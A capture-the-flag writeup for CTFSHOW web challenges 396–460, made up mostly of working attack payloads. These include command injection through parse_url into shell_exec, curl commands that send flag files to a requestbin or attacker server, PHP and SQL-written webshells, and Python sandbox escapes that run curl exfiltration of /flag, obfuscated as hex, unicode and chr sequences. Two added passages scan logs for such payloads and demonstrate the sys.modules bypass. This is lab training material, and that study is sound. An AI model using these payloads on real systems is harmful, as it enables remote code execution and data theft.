[CTFSHOW] CTFSHOW - Other Writeups

Foreword

In the later parts one or two challenge numbers may be written wrong; my bad, sorry.

Web396 (there is actually a universal payload further down, but it is worth trying the other approaches too)

Source code obtained:

<?php
error_reporting(0);
if(isset($_GET['url'])){
    $url = parse_url($_GET['url']);
    shell_exec('echo '.$url['host'].'> '.$url['path']);

}else{
    highlight_file(__FILE__);
}

What it does is write the host part into the file named by path.

url=http://`ls`/var/www/html/1.php

Visiting 1.php reveals fl0g.php.

Tried this, but got no result:

url=http://`cat fl0g.php`/var/www/html/3.php

Never mind, that is pointless; just exfiltrate with curl. Create your own bin at requestbin.net.

?url=http://www.baidu.com/1.php;curl -X POST -d "flag=`cat fl0g.php`" http://requestbin.net/r/1et3jvl1;

Web397-Web401

Same method as above.

Web402

A bit more regex was added: the scheme and host must not contain these characters, so I simply put everything in path.

if(preg_match('/http|https/i', $url['scheme'])){
    die('error');
}
if(!preg_match('/;|>|\||base/i', $url['host'])){
    shell_exec('echo '.$url['host'].'> /tmp/'.$url['path']);
}

Payload:

url=www.baidu.com/1.php;curl -X POST -d "flag=`cat fl0g.php`" http://requestbin.net/r/1et3jvl1;

Web403

<?php
error_reporting(0);
if(isset($_GET['url'])){
    $url = parse_url($_GET['url']);
    // host must look like a dotted-quad IPv4 address
    if(preg_match('/^((2[0-4]\d|25[0-5]|[01]?\d\d?)\.){3}(2[0-4]\d|25[0-5]|[01]?\d\d?)$/', $url['host'])){
        shell_exec('curl '.$url['scheme'].$url['host'].$url['path']);
    }
}

Nothing clever here; it just adds a regex that matches the specified IP format. I don't feel like explaining the regex; if you don't follow it, read up on regular expressions.

url=http://227.220.220.21/1.php;curl -X POST -d "flag=`cat fl0g.php`" http://requestbin.net/r/1et3jvl1;

Web404

Funny, did you find that the challenge environment never seemed to come up? F12 shows that you need to visit 404.php.

Look carefully at the regex and you will see it differs from the previous challenge: the ^ is missing, which means the leading part is controllable.

This challenge cannot use requestbin.net. Why?

The URL requestbin gives us is http://requestbin.net/r/1et3jvl1, with /r/1et... appended at the end; when parse_url processes it, that trailing part is treated as path and the payload gets truncated, so it does not work. I recommend testing this in a local PHP environment; I won't say more.

The solution is to set up a similar receiver on your own server. Here is the payload first; work out why it works yourself, because copying answers only hurts you.

404.php?url=http://;curl -X POST -d "q=`cat fl0g.php`" 42.xxx.xxx.xxx;0.0.0.11/f

Start a web service on the server (it must be port 80): if you append :port, parse_url still cannot be bypassed, so listening with nc will not work either.

index.php:

<?php
	// receiver: append whatever arrives in the q POST field to res.txt
	$cookie = $_POST['q'];
	$myFile = "res.txt";
	file_put_contents($myFile, $cookie, FILE_APPEND);
?>

Then visit res.txt in that directory to get the flag.

web405

Enhanced version of the previous challenge; the scheme part is controllable.

.://;curl -X POST -d "q=`ls`" 42.xxx.xxx.xxx;0.0.0.11/f
or
php://;curl -X POST -d "q=`ls`" 42.xxx.xxx.xxx;0.0.0.11/f
Either one works.
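The common thread in Web396 to Web405 is that parse_url() components reach shell_exec() unescaped, so from the defender's side the useful check is whether a url= parameter carries shell metacharacters into the scheme, host or path. The following is an added Python example, not code from the original writeup; the scheme/host/path splitter only approximates PHP parse_url(), and the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Metacharacters that matter once a URL component reaches shell_exec(); the
# challenge regexes blocked only some of them, and only in some components.
SHELL_META = re.compile(r'[`;|&>]|\$\(')
# Scheme characters PHP's parser accepts (letters, digits, + - .), then "://".
SCHEME_RE = re.compile(r'^([A-Za-z0-9+.-]+)://(.*)$')
# Common-log-format request line: client ... "GET /path?query HTTP/1.1"
REQ_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def split_like_parse_url(url):
    """Rough scheme/host/path split in the spirit of PHP parse_url(): host runs
    from '://' to the next '/', the remainder is path (which is why a callback
    URL ending in /r/... loses that part, as the Web404 note observes)."""
    m = SCHEME_RE.match(url)
    if not m:                     # no scheme: PHP reports only a path
        return {'scheme': '', 'host': '', 'path': url}
    scheme, rest = m.groups()
    host, slash, path = rest.partition('/')
    return {'scheme': scheme, 'host': host, 'path': slash + path}

def flagged_components(url):
    """Names of the components of a decoded url= value that carry metacharacters."""
    return [k for k, v in split_like_parse_url(url).items() if SHELL_META.search(v)]

def scan_log(lines):
    """(client, flagged components) for every request whose url= parameter would
    have carried a shell metacharacter into the challenge's shell_exec()."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        for pair in target.partition('?')[2].split('&'):
            key, _, value = pair.partition('=')
            if key != 'url':
                continue
            flagged = flagged_components(unquote(value))
            if flagged:
                hits.append((client, flagged))
    return hits

# Constructed sample log lines: a benign request, then the Web396, Web404 and
# Web402 payload shapes, URL-encoded the way a browser or curl sends them.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?url=http://www.baidu.com/1.php HTTP/1.1" 200 12',
    '10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /?url=http://%60ls%60/var/www/html/1.php HTTP/1.1" 200 12',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /404.php?url=http://;curl%20-d%20%22q=%60cat%20fl0g.php%60%22%2042.0.0.1;0.0.0.11/f HTTP/1.1" 200 12',
    '10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /?url=www.baidu.com/1.php;curl%20-d%20%22flag=%60cat%20fl0g.php%60%22%20http://203.0.113.9/ HTTP/1.1" 200 12',
]
```

Run scan_log(SAMPLE_LOG) and the benign first line is silent while the three payload shapes are reported with the component (host or path) that would have reached the shell.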

Web406

The environment has been fixed: time-based blind injection no longer works, but you can write a webshell.

<?php require 'config.php';$sql ='select flag from flag into outfile "/var/www/html/1.txt"';$result = $conn->query($sql);var_dump($result); ?>
Converted to hex:
http://a53d40ee-9871-49a0-8f4a-5463bc97e052.chall.ctf.show/?url=0://www.baidu.com;'union/**/select/**/1,0x3c3f70687020726571756972652027636f6e6669672e706870273b2473716c203d2773656c65637420666c61672066726f6d20666c616720696e746f206f757466696c6520222f7661722f7777772f68746d6c2f312e74787422273b24726573756c74203d2024636f6e6e2d3e7175657279282473716c293b7661725f64756d702824726573756c74293b203f3e/**/into/**/outfile/**/"/var/www/html/4.php"%23

Then visit 1.txt.

Web407

A 128-bit IPv6 address is usually written as 8 groups of four hexadecimal digits each. For example, AD80:0000:0000:0000:ABAA:0000:00C2:0002 is a valid IPv6 address. An address this long is inconvenient to read and write, so zero compression can be used to shorten it: if several consecutive groups are all 0, those zeros can simply be written as ::.

ip=cafe::add

And the form above happens to be exactly the form call_user_func uses to call a method of a class.

Web408

Payload:

email="<?=system($_POST[1]);?>"@123.php

See P神's article on FILTER_VALIDATE_EMAIL.
You don't even need to open it; the key point is that otherwise illegal characters can be placed inside double quotes to get past the check.

Web409

$email="echo`whoami`?>"@123.com

The part after @ consists of characters that are not valid PHP syntax; the idea is to close the <?php that precedes it in the page.

That works, but it turns out the leading " is also invalid.
The challenge performs a replacement of .flag, i.e. it replaces flag together with the character before it with nothing. This can be used to strip the invalid double quote at the front of the email, so the PHP code does not error.

Final payload:

email="flagsystem($_POST[1]);?>"@123.com
Then POST the data:
1=cat /flag

web410

?b=on
https://www.w3school.com.cn/php/filter_validate_boolean.asp

web411

?b=oN

web412

ctfshow=?><?php eval($_POST[1]);&1=system('cat flag.php');

web413

ctfshow=/eval($_POST[1]);/&1=system('cat flag.php');

web414

intval of a string is 0:
ctfshow=-1

web415

Case-insensitive:
k=getflaG

web416

f=ctf::flag

Web417

The group owner is really cheeky and made a whole pile of these. After ten minutes of careful analysis:

Pass ?ctfshow=flag to get the flag.

web418

Note that the browser shows a progress bar.
POST:
key=a&clear=;echo cat flag.php > index3.txt;&die=0

web419

The length is limited; just nest one eval inside the other.

code=eval($_POST[1]);&1=system('cat flag.php');

web420

code=nl ../*

Not sure why curl doesn't work for me; saving a script here.

import requests
import time

# each POST creates one file whose name is a fragment of the final command
# (the commented-out assert below hints at the length limit of the challenge)
payload = [
    '>sh ',
    '>ba\\',
    '>\\|\\',
    '>2\\',
    '>2x\\',
    '>xxx.\\',
    '>9x.\\',
    '>1\\',
    '>2.\\',
    '>4\\',
    '>\\ \\',
    '>curl\\',
    # '>cu\\',
]

for i in payload:
    # assert len(i) <= 8
    data = {
        'code': str(i)
    }
    r = requests.post('http://6171141f-4d7c-447c-b0f6-1c92f0abd9be.chall.ctf.show/', data=data)
    print(i)
    time.sleep(1)

web421-422

There are actually many ways; I'm lazy here and just use the universal one. There are also variants such as ls -t.

First send

>cat

then send

*

web423

?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('curl http://xx.xx.xx.xx?1=`cat /flag`'))

web424-web431

One shot for all of them:

?code= str(open('/flag').read())
(note the space right after code=)

web432

http://a43c5775-1d73-4130-9e3f-854ab30caa0b.chall.ctf.show/?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('curl http://xx.xx.xx.xx?1=`cat /flag`'))

web433

http://02367530-ac8c-49ca-a771-bc6d431e7e58.chall.ctf.show/?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__buil''tins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('curl http://xx.xx.xx.xx?1=`cat /flag`'))

web434

http://d866760a-411d-4189-90e8-d431736e3a2c.chall.ctf.show/?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__buil''tins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('wget http://xx.xx.xx.xx?1=`cat /fl*`'))

web435-436

?code=str(exec('import o\x73;o\x73.\x73ystem(\"\\u0063\\u0075\\u0072\\u006c\\u0020\\u0068\\u0074\\u0074\\u0070\\u003a\\u002f\\u002f\\u0034\\u0032\\u002e\\u0031\\u0039\\u0032\\u002e\\u0031\\u0033\\u0037\\u002e\\u0032\\u0031\\u0032\\u003f\\u0031\\u003d\\u0060\\u0063\\u0061\\u0074\\u0020\\u002f\\u0066\\u006c\\u0061\\u0067\\u0060\")'))

"{0:c}{1:c}{2:c}{3:c}{4:c}{5:c}{6:c}{7:c}{8:c}{9:c}{10:c}{11:c}{12:c}{13:c}{14:c}{15:c}{16:c}{17:c}{18:c}{19:c}{20:c}{21:c}{22:c}{23:c}{24:c}{25:c}{26:c}{27:c}{28:c}{29:c}{30:c}{31:c}{32:c}{33:c}{34:c}{35:c}{36:c}{37:c}{38:c}{39:c}{40:c}{41:c}{42:c}{43:c}{44:c}{45:c}{46:c}{47:c}{48:c}{49:c}{50:c}{51:c}{52:c}{53:c}{54:c}{55:c}{56:c}{57:c}{58:c}{59:c}{60:c}{61:c}{62:c}".format(105,109,112,111,114,116,32,111,115,59,111,115,46,115,121,115,116,101,109,40,34,99,117,114,108,32,104,116,116,112,58,47,47,52,50,46,49,57,50,46,49,51,55,46,50,49,50,63,49,61,96,99,97,116,32,47,102,108,97,103,96,34,41)

s = 'import os;os.system("curl http://xx.xx.xx.xx?1=`cat /flag`")'
# build "{0:c}{1:c}...".format(ord0, ord1, ...), which evaluates back to s
res = '"'
for j in range(len(s)):
    res += "{" + f"{j}:c" + "}"
res += '".format('
res += ','.join(str(ord(i)) for i in s)
res += ")"
print(res)
print(eval(res))

web437-438

?code=str(exec('import o\x73;o\x73.\x73ystem(\"\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x34\x32\x2e\x31\x39\x32\x2e\x31\x33\x37\x2e\x32\x31\x32\x3f\x31\x3d\x60\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x60")'))

web439-440

s = 'import os;os.system("curl http://xx.xx.xx.xx?1=`cat /flag`")'
# chr(n)+chr(n)+... with + already URL-encoded as %2B; strip the trailing %2B
res = ''
for i in s:
    res += f"chr({ord(i)})%2B"
print(res[:-3])

code=str(exec(chr(105)%2Bchr(109)%2Bchr(112)%2Bchr(111)%2Bchr(114)%2Bchr(116)%2Bchr(32)%2Bchr(111)%2Bchr(115)%2Bchr(59)%2Bchr(111)%2Bchr(115)%2Bchr(46)%2Bchr(115)%2Bchr(121)%2Bchr(115)%2Bchr(116)%2Bchr(101)%2Bchr(109)%2Bchr(40)%2Bchr(34)%2Bchr(99)%2Bchr(117)%2Bchr(114)%2Bchr(108)%2Bchr(32)%2Bchr(104)%2Bchr(116)%2Bchr(116)%2Bchr(112)%2Bchr(58)%2Bchr(47)%2Bchr(47)%2Bchr(52)%2Bchr(50)%2Bchr(46)%2Bchr(49)%2Bchr(57)%2Bchr(50)%2Bchr(46)%2Bchr(49)%2Bchr(51)%2Bchr(55)%2Bchr(46)%2Bchr(50)%2Bchr(49)%2Bchr(50)%2Bchr(63)%2Bchr(49)%2Bchr(61)%2Bchr(96)%2Bchr(99)%2Bchr(97)%2Bchr(116)%2Bchr(32)%2Bchr(47)%2Bchr(102)%2Bchr(108)%2Bchr(97)%2Bchr(103)%2Bchr(96)%2Bchr(34)%2Bchr(41)))

web441

str().join([chr(105),chr(109),chr(112),chr(111),chr(114),chr(116),chr(32),chr(111),chr(115),chr(59),chr(111),chr(115),chr(46),chr(115),chr(121),chr(115),chr(116),chr(101),chr(109),chr(40),chr(34),chr(99),chr(117),chr(114),chr(108),chr(32),chr(104),chr(116),chr(116),chr(112),chr(58),chr(47),chr(47),chr(52),chr(50),chr(46),chr(49),chr(57),chr(50),chr(46),chr(49),chr(51),chr(55),chr(46),chr(50),chr(49),chr(50),chr(63),chr(49),chr(61),chr(96),chr(99),chr(97),chr(116),chr(32),chr(47),chr(102),chr(108),chr(97),chr(103),chr(96),chr(34),chr(41)])

web442

exec(request.args.get(str(None)))&None=import os;os.system("curl http://xx.xx.xx.xx?1=`cat /flag`")
Of course you can also construct the number, heh:
print((len(str(None))*len(str(None))*len(str(None))+len(str(None))))
print(chr(68))

web443

# build an expression that evaluates to `number` using only ~, << and the
# values 0/1 obtained from len(str()) and len(str(None))/len(str(None))
def getNumber3(number):
    number = int(number)
    if number in [-2, -1, 0, 1]:
        return ["~int((len(str(None))/len(str(None))))", "~int(len(str()))",
                "int(len(str()))", "int((len(str(None))/len(str(None))))"][number + 2]

    if number % 2:
        return "~%s" % getNumber3(~number)
    else:
        return "(%s<<(int((len(str(None))/len(str(None))))))" % getNumber3(number / 2)

s = 'import os;os.system("curl http://xxxx?1=`cat /flag`")'
res = 'str().join(['
for i in s:
    res += f"chr({getNumber3(ord(i))}),"
res = res[:-1]
res += '])'
print(res)

web444

# same construction as web443, with 0/1 taken from int(False)/int(True)
def getNumber3(number):
    number = int(number)
    if number in [-2, -1, 0, 1]:
        return ["~int(True)", "~int(False)",
                "int(False)", "int(True)"][number + 2]

    if number % 2:
        return "~%s" % getNumber3(~number)
    else:
        return "(%s<<(int(True)))" % getNumber3(number / 2)


# alternative: 0/1 from list/tuple comparisons, with no names at all
def getNumber2(number):
    number = int(number)
    if number in [-2, -1, 0, 1]:
        return ["~([]<())", "~([]<[])",
                "([]<[])", "([]<())"][number + 2]

    if number % 2:
        return "~%s" % getNumber2(~number)
    else:
        return "(%s<<([]<()))" % getNumber2(number / 2)

s = 'import os;os.system("curl http://xxxx?1=`cat /flag`")'
# s = '123'
res = 'str().join(['
for i in s:
    res += f"chr({getNumber3(ord(i))}),"
res = res[:-1]
res += '])'
print(res)

web445-447

reload re-imports the module:

s = 'from importlib import reload;import os;reload(os);os.system("curl http://xxxx?1=`cat /flag`")'

web448

import sys;sys.modules['os']='/usr/local/lib/python3.8/os.py';import os;os.system() 

Or:

Python has several places it looks for packages, and sys.modules comes first; the WAF has put os into sys.modules as None, so the import errors out. The fix is to delete that entry: when the interpreter cannot find it there, it moves on to the next location.

import sys
del sys.modules['os']
import os
os.system() 
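To show why the Web448 trick works, and why a None entry in sys.modules is not a security boundary, here is an added Python demonstration that is not part of the original writeup. It takes any importable module name; run it with a harmless standard-library module such as colorsys rather than os, and it restores the original cached module when done.

```python
import importlib
import sys

def import_under_sys_modules_block(name):
    """Simulate the Web448 sandbox: put None in sys.modules[name] and try to
    import it. Returns 'blocked' on ImportError, 'ok' otherwise. The original
    cached module object is restored afterwards."""
    saved = importlib.import_module(name)   # make sure a cached copy exists
    sys.modules[name] = None                 # the sandbox's "block"
    try:
        importlib.import_module(name)
        return 'ok'
    except ImportError:                      # raised as ModuleNotFoundError
        return 'blocked'
    finally:
        sys.modules[name] = saved

def import_after_deleting_entry(name):
    """Same block, but remove the None entry first, as the writeup does with
    del sys.modules['os']. Returns True if the import then succeeds and yields
    a freshly executed module object distinct from the cached one."""
    saved = importlib.import_module(name)
    sys.modules[name] = None
    del sys.modules[name]                    # the bypass step from the writeup
    try:
        fresh = importlib.import_module(name)
        return fresh is not saved            # the import path was searched again
    finally:
        sys.modules[name] = saved            # put the original object back
```

The first function returns 'blocked' and the second True: the None entry only short-circuits the lookup, and once it is gone the normal finders run again.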

web449

Blind extraction. The idea is here; do it yourself, everything is given, and I have already provided the payload-generation code.

import time;f=open("/flag").read(1);time.sleep(3) if f=="c" else 2

web450

phpinfo^phpinfo^phpinfo

web451

aaahppo^phphppo^aaainfo

web452

((p).(h).(p).(i).(n).(f).(o))();

web453, 455, 456

http://f22d6fe3-0c9d-44bb-b78b-a6a8c166a606.chall.ctf.show/ctf/file
s=<?php system('curl http://4x.xxx.xxx7.2xx?1=`ls`'); ?>
http://f22d6fe3-0c9d-44bb-b78b-a6a8c166a606.chall.ctf.show/ctf/exec

web454

http://3adee915-6f8f-4cb2-b195-2180e9a8e272.chall.ctf.show/ctf/file
s=<?php system('curl http://4x.xxx.xxx7.2xx?1=`cat flaaags`'); ?>
http://f22d6fe3-0c9d-44bb-b78b-a6a8c166a606.chall.ctf.show/ctf/include

web457

Just get into the second branch:

?u=admin&p=phpinfo

web458

hint:

get_class(): gets the class name of the currently calling method;
get_called_class(): gets the class name after late static binding.

web459

hint:

It can be combined with a PHP stream wrapper (pseudo-protocol) to get the flag, so I won't spell out the next steps; afterwards visit the page and base64-decode the output.

web460

hint: use urllib to exfiltrate the data. Feels like the challenges have drifted off topic; not much point to this one.

s = 'import urllib.request;import ssl;f=open("/flag").read(100);context = ssl._create_unverified_context();url = "http://xxx?1="+f;request = urllib.request.Request(url);response = urllib.request.urlopen(url=request,context=context)'